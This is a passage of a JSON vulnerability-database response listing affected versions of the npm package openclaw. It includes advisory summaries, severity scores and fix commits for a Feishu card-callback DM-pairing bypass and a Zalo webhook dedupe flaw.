                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35668",
                "GHSA-hr5v-j9h9-xjhg"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d3qp-5wm9-aqfp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90876?format=api",
            "vulnerability_id": "VCID-d864-qy75-c3dx",
            "summary": "OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n## Summary\n\nThe Feishu raw card send surface can mint legacy card callbacks that bypass DM pairing.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`.\n\n## Fix Commit(s)\n\n- `81c45976db532324b5a0918a70decc19520dc354`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35664",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27048",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27001",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2704",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35664"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35664",
                    "reference_id": "CVE-2026-35664",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35664"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-77w2-crqv-cmv3",
                    "reference_id": "GHSA-77w2-crqv-cmv3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-77w2-crqv-cmv3"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks",
                    "reference_id": "openclaw-dm-pairing-bypass-via-legacy-card-callbacks",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35664",
                "GHSA-77w2-crqv-cmv3"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d864-qy75-c3dx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89306?format=api",
            "vulnerability_id": "VCID-d8v2-gft5-buee",
            "summary": "OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates.\n\n## Impact\n\nCross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @D0ub1e-D for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41354",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1772",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17683",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17714",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41354"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41354",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41354"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rxmx-g7hr-8mx4",
                    "reference_id": "GHSA-rxmx-g7hr-8mx4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rxmx-g7hr-8mx4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
